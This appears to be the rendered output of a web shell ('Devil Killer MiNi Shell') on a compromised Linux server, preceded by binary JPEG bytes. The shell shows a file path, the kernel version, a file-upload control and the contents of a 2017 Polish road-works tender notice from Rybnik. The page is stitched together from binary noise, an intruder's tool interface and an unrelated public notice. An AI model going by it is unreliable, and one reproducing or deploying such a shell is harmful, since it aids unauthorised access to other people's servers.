JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20170324/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20170324/50936-N-2017.html

<BR/><p>Adres strony internetowej, na której zamieszczona będzie specyfikacja istotnych warunków zamówienia (jeżeli dotyczy):  </p><a class='base announcementNumber' href='http://www.bip.zdp.powiatrybnicki.pl' target='_blank'>http://www.bip.zdp.powiatrybnicki.pl</a><br/><hr class='linkedItemsSeparator' /><div class="divRow_xforms"><div>
              Ogłoszenie nr 50936 - 2017
              z dnia 2017-03-24 r.
            </div><div class="headerMedium_xforms" style="text-align: center">Rybnik: Przebudowa skrzyżowania dróg powiatowych 5608S i 5026S
oraz drogi gminnej ulicy Rudzkiej w Gaszowicach.
<br />
            OGŁOSZENIE O ZAMÓWIENIU -
            
              Roboty budowlane
            </div><div><b>Zamieszczanie ogłoszenia:</b>
              obowiązkowe
            </div><div><b>Ogłoszenie dotyczy:</b>
              zamówienia publicznego
            </div><div><b>Zamówienie dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej </b><br /><div style="padding-left: 20px">
                nie
              </div><br /><b>Nazwa projektu lub programu</b><br /></div><div><b>O zamówienie mogą ubiegać się wyłącznie zakłady pracy chronionej oraz wykonawcy, których działalność, lub działalność ich wyodrębnionych organizacyjnie jednostek, które będą realizowały zamówienie, obejmuje  społeczną i zawodową integrację osób będących członkami grup społecznie marginalizowanych </b><br /><div style="padding-left: 20px">
                nie
              </div><br />
            Należy podać minimalny procentowy wskaźnik zatrudnienia osób należących do jednej lub więcej kategorii, o których mowa w art. 22 ust. 2 ustawy Pzp, nie mniejszy niż 30%, osób zatrudnionych przez zakłady pracy chronionej lub wykonawców albo ich jednostki (w %)
            <br /></div><div class="headerLarge_xforms" style="text-align: left"><u>SEKCJA I: ZAMAWIAJĄCY</u></div><div style="padding-left: 20px"><b>Postępowanie przeprowadza centralny zamawiający </b><br /><div style="padding-left: 20px">
                nie
              </div><b>Postępowanie przeprowadza podmiot, któremu zamawiający powierzył/powierzyli przeprowadzenie postępowania </b><br /><div style="padding-left: 20px">
                nie
              </div><b>Informacje na temat podmiotu któremu zamawiający powierzył/powierzyli prowadzenie postępowania:</b><br /><b>Postępowanie jest przeprowadzane wspólnie przez zamawiających</b><br /><div style="padding-left: 20px">
                nie
              </div><br />
            Jeżeli tak, należy wymienić zamawiających, którzy wspólnie przeprowadzają postępowanie oraz podać adresy ich siedzib, krajowe numery identyfikacyjne oraz osoby do kontaktów wraz z danymi do kontaktów:
            <br /><br /><b>Postępowanie jest przeprowadzane wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej </b><br /><div style="padding-left: 20px">
                nie
              </div><b>W przypadku przeprowadzania postępowania wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej  mające zastosowanie krajowe prawo zamówień publicznych:</b><br /><b>Informacje dodatkowe:</b><br /></div><div style="padding-left: 20px;"><div style="text-align: left"><b>I. 1) NAZWA I ADRES: </b>Zarząd Dróg Powiatowych, krajowy numer identyfikacyjny
              27628565500000, ul.
              ul. Jankowicka 
              49,
              44200  
              Rybnik, woj.
              śląskie, państwo
              Polska, tel.
              32 4227478, 4227874, e-mail
              ZDP@POWIATRYBNICKI.PL, faks
              324 227 479.
              <br />
              Adres strony internetowej (URL): www.bip.zdp.powiatrybnicki.pl<br /><br /></div><div style="text-align: left"><b>I. 2) RODZAJ ZAMAWIAJĄCEGO: </b>
                Administracja samorządowa
              </div><div style="text-align: left"><b>
                I.3) WSPÓLNE UDZIELANIE ZAMÓWIENIA <i>(jeżeli dotyczy)</i>:
              </b><div style="padding-left: 20px">
                Podział obowiązków między zamawiającymi w przypadku wspólnego przeprowadzania postępowania, w tym
                w przypadku wspólnego przeprowadzania postępowania z zamawiającymi z innych państw członkowskich Unii Europejskiej (który z zamawiających jest odpowiedzialny za przeprowadzenie postępowania, czy i w jakim zakresie za przeprowadzenie postępowania odpowiadają pozostali zamawiający, czy zamówienie będzie udzielane przez każdego z zamawiających indywidualnie, czy zamówienie zostanie udzielone w imieniu i na rzecz pozostałych zamawiających):
                <br /></div></div><div style="text-align: left"><b>
                I.4) KOMUNIKACJA:
              </b><br /><b>Nieograniczony, pełny i bezpośredni dostęp do dokumentów z postępowania można uzyskać pod adresem (URL)</b><div style="padding-left: 20px">
                  tak
                <br />www.bip.zdp.powiatrybnicki.pl</div><br /><b>Adres strony internetowej, na której zamieszczona będzie specyfikacja istotnych warunków zamówienia </b><div style="padding-left: 20px">
                  tak
                <br />www.bip.zdp.powiatrybnicki.pl</div><br /><b>Dostęp do dokumentów z postępowania jest ograniczony - więcej informacji można uzyskać pod adresem </b><div style="padding-left: 20px">
                  nie
                <br /></div><br /><b>Oferty lub wnioski o dopuszczenie do udziału w postępowaniu należy przesyłać:</b><br /><b>Elektronicznie</b><div style="padding-left: 20px">
                  nie
                <br />
                adres
                <br /></div><br /><div style="padding-left: 20px"><b>Dopuszczone jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b><br />
                  nie
                <br /><b>Wymagane jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b><br />
                  tak
                  <br />
                  Inny sposób:
                  <br />w formie pisemnej<br />
                Adres:
                <br />Zarząd Dróg Powiatowych, ul. Jankowicka 49, 44-200 Rybnik, pokój 14 (sekretariat).</div><br /><b>Komunikacja elektroniczna wymaga korzystania z narzędzi i urządzeń lub formatów plików, które nie są ogólnie dostępne</b><div style="padding-left: 20px">
                  nie
                <br />
                Nieograniczony, pełny, bezpośredni i bezpłatny dostęp do tych narzędzi można uzyskać pod adresem: (URL)
                <br /></div></div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA II: PRZEDMIOT ZAMÓWIENIA
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><br /><b>II.1) Nazwa nadana zamówieniu przez zamawiającego: </b>Przebudowa skrzyżowania dróg powiatowych 5608S i 5026S
oraz drogi gminnej ulicy Rudzkiej w Gaszowicach.
<br /><b>Numer referencyjny: </b>ZP-SD/6DP/17<br /><b>Przed wszczęciem postępowania o udzielenie zamówienia przeprowadzono dialog techniczny </b><br /><div style="padding-left: 20px; text-align: justify">
                  nie
                </div><br /><b>II.2) Rodzaj zamówienia: </b>
                roboty budowlane
              <br /><b>II.3) Informacja o możliwości składania ofert częściowych</b><br />
              Zamówienie podzielone jest na części:
              <br /><div style="padding-left: 20px">
                  Nie
                </div><br /><br /><b>
                II.4) Krótki opis przedmiotu zamówienia
              </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań )</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:
              </b>Przedmiotem zamówienia jest  Przebudowa skrzyżowania dróg powiatowych 5608S i 5026S oraz drogi gminnej ulicy Rudzkiej                w Gaszowicach, obejmująca: 
              a)    Przebudowę skrzyżowania dróg część drogową w zakresie : 
-	ulicy Rybnickiej DP 5608S odcinek R ÷ R5 od km 0+000,00 do km 0+116,18 (oś ronda)- 100,18 m,
-	ulicy Rydułtowskiej DP 5026S odcinek R6 ÷ R5 od km 0+000,00 do km 0+110,26 (oś ronda) -	  94,26 m,
-	ulica Wiejskiej DP 5608S odcinek W ÷ R5 od km 0+000,00 do km 0+073,82 (oś ronda) -   57,82 m,
-	ulica Rudzkiej odcinek R4a ÷ R4b od km 0+000,00 do km 0+040,28 (od krawędzi ul. Rybnickiej DP 5608S)- 25,42 m,
-	tarcza ronda - o promieniu 13,00 m-  81,64 m,
-	przystanek autobusowy - odcinek od km 0+000,00 do km 0+060,15	-  60,15 m,
-	zjazd (wyjazd) przystanek autobusowy - odcinek od km 0+000,00 do km 0+023,02 m (od krawędzi ul. Rybnickiej)-19,32 m .
         Zakres robót obejmuje wykonanie:
         - robót przygotowawczych,
         - robót rozbiórkowych,
         - przebudowy nawierzchni jezdni,
         - przebudowy chodników,
         - wjazdów,
         - odwodnienia, kratek ściekowych, przyłączy,
         - regulacji wysokościowej studni, skrzynek zasuw wodociągowych,
         - zabezpieczenia urządzeń obcych,
         - humusowania,
         - wprowadzenia stałej organizacji ruchu  oznakowanie poziome i pionowe.
Szczegółową lokalizację pokazano na mapie zasadniczej w skali 1:500  Rys nr 1 projektu  budowlano-wykonawczego.
        b)    Przebudowę skrzyżowania dróg część elektryczną  obejmującą : 
  Rozbudowę i modernizację oświetlenia ulicznego poprzez:
            likwidację opraw sodowych  , likwidację wysięgników pojedynczych , likwidację istniejących słupów betonowych,                                                                             
                przewieszenie kabla zasilającego i wizyjnego na sąsiedni słup, przewieszenie na nowe słupy kabli 
                telekomunikacyjnych, montaż i stawianie słupów aluminiowych cylindrycznych dwuelementowych anodowanych 
                z wysięgnikiem czteroramiennym z fundamentem ,  montaż obudowy wolnostojącej kompletnej + fundament montaż 
                opraw  oświetlenia zewnętrznego na wysięgniku ,  izolacyjne złącze  bezpiecznikowe i zerowe, układanie kabli
                w rowach kablowych, układanie bednarki w rowach kablowych, montaż  przewodów do opraw oświetleniowych  
                (wciąganie na słupy, rury  osłonowe i wysięgniki przy wysokości latarń do 10 m,  ułożenie rur osłonowych z PCW.  
                W ramach przebudowy części elektrycznej należy wykonać również wszelkie pomiary powykonawcze rezystancji 
                izolacji, rezystancji uziemienia, skuteczności ochrony  od porażeń prądem elektrycznym , a także dopuszczenia, 
                wyłączenia i  inne                                                                                               . 

     2.      Powyższe zapisy i ilości wyszczególniają ważniejsze pozycje występujące w projekcie, opisane w wersji skróconej, 
                celem orientacji  co do  zakresu   robót. 
               Opis ten nie powiela przedmiaru robót  ani nie uwzględnia  pełnego zakresu prac przewidzianego projektem.  
               Szczegóły dotyczące opisu przedmiotu zamówienia , zakresu robót, konstrukcji oraz technologii wykonania i odbioru           
                robót zawierają: projekt budowlano- wykonawczy (stanowiący załącznik nr 10 do SIWZ) wraz  ze Specyfikacjami  
               Technicznymi Wykonania i Odbioru  Robót  a także  przedmiary robót  dla części drogowej i części elektrycznej.  
               Dołączone przedmiary robót stanowią  materiał pomocniczy do wyceny . Przedmiar robót nie stanowi samodzielnej  
                podstawy wyceny robót . Pozycje należy zestawiać z dokumentacją projektową i Specyfikacjami   Technicznymi 
               Wykonania i Odbioru  Robót.

POZOSTAŁE INFORMACJE  :
4.	Wszystkie nazwy produktów i materiałów przywołane w niniejszej specyfikacji służą jedynie  ustaleniu wymaganego 
        standardu.
Uwaga: Wszystkie wymienione w dokumentacji materiały opatrzone nazwami mają na celu określenie wymaganych   
minimalnych parametrów, co oznacza, że Zamawiający dopuszcza materiały innych producentów pod warunkiem   
spełnienia przez nie minimalnych parametrów. Informujemy, że zgodnie z art. 30 ust. 5 ustawy, Wykonawca, który  
powołuje się na rozwiązania równoważne z opisanymi przez Zamawiającego, jest obowiązany wykazać, że 
oferowane przez niego dostawy, usługi lub roboty budowlane spełniają wymagania określone przez Zamawiającego.  
Za produkt równoważny Zamawiający uzna jedynie taki, który ma tożsame lub nie gorsze parametry jakościowe               
 i użytkowe w stosunku do opisanego.
        5.     Przedmiot umowy zostanie wykonany z materiałów dostarczonych przez Wykonawcę. Materiały te powinny 
                odpowiadać co do  jakości wymaganiom określonym w ustawie z dnia 16 kwietnia 2004 r. o wyrobach budowlanych 
                (Dz.U. Nr 92, poz. 881 ze zmianami Dz.U. z 2015 r. poz. 1165) oraz wymaganiom określonym w Specyfikacjach 
                Technicznych Wykonania i Odbioru Robót ;
Zamawiający nie dopuszcza użycia materiałów z odzysku.
        6.    Przedmiot umowy może być  rozliczany fakturami częściowymi  na podstawie częściowych protokołów odbioru robót 
                podpisanych przez  kierownika  budowy oraz  wyznaczonego przez Zamawiającego inspektora nadzoru. Faktury 
                częściowe  nie mogą przekroczyć 70% ceny ofertowej robót.
                Rozliczenie końcowe nastąpi fakturą końcową po podpisaniu protokołu odbioru końcowego robót budowlanych przez  
                kierownika  budowy oraz  wyznaczonego przez Zamawiającego inspektora nadzoru.

7.	Roboty powinny być prowadzone w sposób zapewniający przejazd i dojście do obiektów zlokalizowanych w rejonie  
        skrzyżowania.
8.	Przed przystąpieniem do robót, Wykonawca na własny koszt zobowiązany jest do opracowania  i uzyskania  
        zatwierdzenia  projektu zmiany organizacji ruchu na czas prowadzenia robót zgodnie z Rozporządzeniem Ministra 
        Infrastruktury z dnia 23 września  2003 r. w sprawie  szczegółowych warunków zarządzania ruchem na drogach oraz 
        wykonania nadzoru nad tym zarządzaniem Dz.U. nr 177 , poz. 1729 ze zmianami.
                Do Wykonawcy należy również wprowadzenie organizacji ruchu, koszt  oznakowania robót  i utrzymywanie go 
                w  należytym stanie przez cały okres trwania robót.
       9.      Zamawiający nie dopuszcza zamknięcia dróg  na czas prowadzenia robót, za wyjątkiem wykonywania warstwy 
                ścieralnej.
10.     Na podstawie art. 29 ust. 3a, Zamawiający określa obowiązek zatrudnienia na podstawie umowy o pracę 
          wszystkie osoby wykonujące następujące czynności w zakresie realizacji  przedmiotu zamówienia:
           -              pracownicy fizyczni wykonujący prace rozbiórkowe
           -              pracownicy fizyczni wykonujący warstwy konstrukcyjne nawierzchni,
           -              pracownicy fizyczni wykonujący prace brukarskie; 
           -              pracownicy fizyczni wykonujący prace związane z układaniem warstw bitumicznych; 
           -              pracownicy montujący słupy energetyczne
                Jeżeli wykonywanie tych czynności polega na wykonywaniu pracy w rozumieniu przepisów kodeksu pracy. 
                Obowiązek ten dotyczy także podwykonawców   wykonawca jest zobowiązany zawrzeć w każdej umowie 
                o podwykonawstwo stosowne zapisy zobowiązujące podwykonawców do zatrudnienia na umowę o  pracę 
                wszystkich osób wykonujących wskazane wyżej czynności. Sposób dokumentowania zatrudnienia na 
                podstawie umowy o pracę oraz kontrolowanie tego obowiązku przez zamawiającego zawarto w § 15
                Istotnych Postanowień Warunków Umownych, stanowiących załącznik Nr 8 do SIWZ.
<br /><br /><b>II.5) Główny kod CPV: </b>45233120-6<br /><b> Dodatkowe kody CPV:</b>45100000-8,
                45111000-8,
                45233142-6,
                31321100-3,
                45315300-1,
                45315600-4<br /><b>
                II.6) Całkowita wartość zamówienia </b><i>(jeżeli zamawiający podaje informacje o wartości zamówienia)</i>:
              
              <br />
              Wartość bez VAT:
              <br />
              Waluta:
              <br /><div style="padding-left: 20px"><br /><i>(w przypadku umów ramowych lub dynamicznego systemu zakupów  szacunkowa całkowita maksymalna wartość w całym okresie obowiązywania umowy ramowej lub dynamicznego systemu zakupów)</i></div><br /><b>
                II.7)
                Czy przewiduje się udzielenie zamówień, o których mowa w art. 67 ust. 1 pkt 6 i 7  lub w art. 134 ust. 6 pkt 3  ustawy Pzp:
              </b>
                nie
              <br /><b>II.8) Okres, w którym realizowane będzie zamówienie lub okres, na który została zawarta umowa ramowa lub okres, na który został ustanowiony dynamiczny system zakupów:</b><div style="padding-left: 20px">
                    Okres w dniach: 135<br /></div><br /><b>II.9) Informacje dodatkowe: </b></div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><b>
                III.1) WARUNKI UDZIAŁU W POSTĘPOWANIU
              </b><br /><div style="padding-left: 20px"><b>III.1.1) Kompetencje lub uprawnienia do prowadzenia określonej działalności zawodowej, o ile wynika to z odrębnych przepisów</b><br />
                Określenie warunków:
                Zamawiający nie określa warunku.<br />
                Informacje dodatkowe
                <br /><b>III.1.2)  Sytuacja finansowa lub ekonomiczna  </b><br />
                Określenie warunków:
                Zamawiający nie określa warunku.<br />
                Informacje dodatkowe
                <br /><b>III.1.3) Zdolność techniczna lub zawodowa </b><br />
                Określenie warunków:
                
       Wykonawca spełni warunek jeżeli wykaże, że należycie wykonał w okresie ostatnich pięciu lat   przed upływem składania 
    ofert, a jeżeli okres prowadzenia działalności jest krótszy  w tym okresie, zgodnie z przepisami prawa budowlanego 
    i prawidłowo ukończył co najmniej 2 roboty budowlane   polegające na   wykonaniu  przebudowy, 
    rozbudowy lub budowy  drogi  o nawierzchni bitumicznej   wraz  z infrastrukturą drogową  ,o łącznej wartości co najmniej 1 500 000,00 złotych brutto .
Warunek udziału w postępowaniu, musi być spełniony: 
	przez Wykonawcę samodzielnie lub
	przez minimum jeden podmiot udostępniający doświadczenie (podwykonawcę) samodzielnie; 
	a w przypadku Wykonawców występujących wspólnie, samodzielnie przez minimum jednego z Wykonawców występujących wspólnie. 
           Nie jest dopuszczalne łączenie (sumowanie) wyżej wymaganego doświadczenia w ramach doświadczenia różnych 
           podmiotów zaangażowanych w realizację zamówienia.
Jeżeli w dokumentach składanych w celu potwierdzenia spełniania warunków udziału  w postępowaniu, kwoty będą wyrażane w walucie obcej, kwoty te zostaną przeliczone na PLN wg średniego kursu PLN w stosunku do walut obcych ogłaszanego przez Narodowy Bank Polski w dniu opublikowania ogłoszenia o zamówieniu  w Biuletynie Zamówień Publicznych.
Wykonawca spełni warunek jeżeli wykaże, że dysponuje osobami do realizacji zamówienia, w tym co najmniej:

- jedną osobą, która będzie pełniła funkcję kierownika budowy ,posiadającą uprawnienia do  kierowania robotami budowlanymi  
  w specjalności drogowej lub odpowiadające im ważne   uprawnienia   budowlane,  które zostały wydane             
  na podstawie   wcześniej obowiązujących  przepisów, która posiada doświadczenie zawodowe ( tj. pełniła funkcję kierownika 
  budowy ) w kierowaniu co najmniej 1 robotą budowlaną  , polegającą na    przebudowie , rozbudowie lub budowie  drogi                  
  o nawierzchni   bitumicznej   wraz  z infrastrukturą drogową  o łącznej wartości co najmniej 1 000 000,00 złotych brutto .

- jedną osobą posiadającą uprawnienia budowlane w specjalności instalacyjnej w zakresie sieci, instalacji  i urządzeń  
  elektrycznych  , która będzie pełniła funkcję kierownika robót  elektrycznych  (przebudowa  oświetlenia ulicznego), posiadającą       
  doświadczenie  w kierowaniu co najmniej 1 robotą budowlaną  na stanowisku kierownika  robót elektrycznych,  o  wartości co 
  najmniej  50 000,00 złotych brutto.
<br />
                Zamawiający wymaga od wykonawców wskazania w ofercie lub we wniosku o dopuszczenie do udziału w postępowaniu imion i nazwisk osób wykonujących czynności przy realizacji zamówienia wraz z informacją o kwalifikacjach zawodowych lub doświadczeniu tych osób:
                
                  tak
                <br />
                Informacje dodatkowe:
                Zgodnie z zasadami określonymi we właściwych przepisach, Zamawiający dopuszcza także pełnienie w.w. funkcji przez osoby  
  posiadające odpowiednie kwalifikacje zawodowe zdobyte w innych państwach na zasadach określonych w art. 12a ustawy          
  z   dnia 7 lipca 1994r. Prawo budowlane (Dz.U. z 2016 r. poz. 290 ze zm., z uwzględnieniem postanowień ustawy z dnia            
 22   grudnia 2015 r. o zasadach uznawania kwalifikacji zawodowych nabytych w państwach członkowskich Unii Europejskiej 
 (Dz.U.   z 2016 r. poz. 65). 
</div><b>
                III.2) PODSTAWY WYKLUCZENIA
              </b><br /><div style="padding-left: 20px"><b>III.2.1) Podstawy wykluczenia określone w art. 24 ust. 1  ustawy Pzp</b><br /><b>III.2.2) Zamawiający przewiduje wykluczenie wykonawcy na podstawie art. 24 ust. 5 ustawy Pzp</b>
                  nie
                <br /></div><b>
                III.3) WYKAZ OŚWIADCZEŃ SKŁADANYCH PRZEZ WYKONAWCĘ W CELU WSTĘPNEGO POTWIERDZENIA, ŻE NIE PODLEGA ON WYKLUCZENIU ORAZ SPEŁNIA WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ SPEŁNIA KRYTERIA SELEKCJI
              </b><br /><div style="padding-left: 20px"><b>
                  Oświadczenie o niepodleganiu wykluczeniu oraz spełnianiu warunków udziału w postępowaniu
                </b><br />
                  tak
                <br /><b>
                  Oświadczenie o spełnianiu kryteriów selekcji
                </b><br />
                  nie
                </div><b>
                III.4) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW , SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 3 USTAWY PZP:
              </b><br /><div style="padding-left: 20px"></div><b>
                III.5) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 1 USTAWY PZP
              </b><br /><div style="padding-left: 20px"><b>III.5.1) W ZAKRESIE SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU:</b><br />1.   wykazu robót budowlanych należycie wykonanych w okresie ostatnich pięciu lat przed upływem  terminu składania ofert, 
        a jeżeli okres prowadzenia działalności jest krótszy  w tym okresie, wraz z podaniem ich rodzaju, wartości, daty
        i podmiotów na rzecz których roboty te zostały wykonane  (wzór wg załącznika nr 5 do SIWZ)
      
 2.   załączonych do wykazu dowodów określających czy te roboty zostały wykonane należycie, w szczególności informacji
        o tym czy roboty zostały wykonane zgodnie z przepisami prawa  budowlanego i prawidłowo ukończone.

        UWAGA: Dowodami, o których mowa, są referencje bądź inne dokumenty wystawione przez   podmiot, na rzecz 
        którego roboty budowlane zostały wykonane, a jeżeli z uzasadnionej przyczyny  o obiektywnym charakterze 
        Wykonawca nie jest w stanie uzyskać tych dokumentów  inne  dokumenty.
3.    wykazu osób, skierowanych przez Wykonawcę do realizacji zamówienia, odpowiedzialnych za  kierowanie robotami 
         budowlanymi wraz z informacją na temat ich kwalifikacji zawodowych,  uprawnień, a także zakresu wykonywanych przez 
         nich czynności oraz informacją o podstawie do dysponowania w.w. osobami, potwierdzający spełnianie warunku udziału 
         w postępowaniu  opisanego w sekcji V pkt 3c SIWZ  (wzór wg załącznika nr 6 do SIWZ)
<br /><b>III.5.2) W ZAKRESIE KRYTERIÓW SELEKCJI:</b><br /></div><b>
                III.6) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 2 USTAWY PZP
              </b><br /><div style="padding-left: 20px"></div><b>
                III.7) INNE DOKUMENTY NIE WYMIENIONE W pkt III.3) - III.6)
              </b><div style="padding-left: 20px">1. Dowód  wniesienia  wadium.
2.Wykonawca, który polega na zdolnościach lub sytuacji innych podmiotów, musi udowodnić zamawiającemu, że 
    realizując zamówienie, będzie dysponował niezbędnymi zasobami tych podmiotów, w szczególności przedstawiając 
    zobowiązanie tych podmiotów do oddania mu  do  dyspozycji niezbędnych zasobów na potrzeby realizacji 
    zamówienia ( wzór wg Załącznika nr  7 do SIWZ).
3.  Pełnomocnictwo złożone w formie oryginału lub notarialnie poświadczonej kopii w sytuacji:
a)  wykonawców wspólnie ubiegających się o udzielenie zamówienia  pełnomocnictwo do  reprezentowania 
    wszystkich Wykonawców wspólnie ubiegających się o udzielenie zamówienia. 
     Pełnomocnik może być ustanowiony do  reprezentowania Wykonawców w postępowaniu albo do reprezentowania 
    w postępowaniu i zawarcia umowy,
b)  podpisania oferty względnie innych dokumentów składanych wraz z ofertą przez osobę, dla której 
     prawo do ich podpisania nie wynika z innych dokumentów złożonych wraz z ofertą   pełnomocnictwo do 
     podpisania oferty.
4. W przypadku wspólnego ubiegania się o zamówienie przez Wykonawców, oświadczenia, o niepodleganiu 
     wykluczeniu oraz spełnianiu warunków udziału w postępowaniu składa każdy z Wykonawców wspólnie 
     ubiegających się o udzielenie zamówienia.
5. Wykonawca w terminie 3 dni od dnia zamieszczenia na stronie internetowej informacji, o której  mowa w art. 86
    ust. 5  ustawy, przekaże Zamawiającemu, bez dodatkowego wezwania,   oświadczenie o przynależności lub braku 
    przynależności do tej samej grupy kapitałowej ( wzór wg  załącznika nr 4 do SIWZ), o której mowa w art. 24 ust. 1 
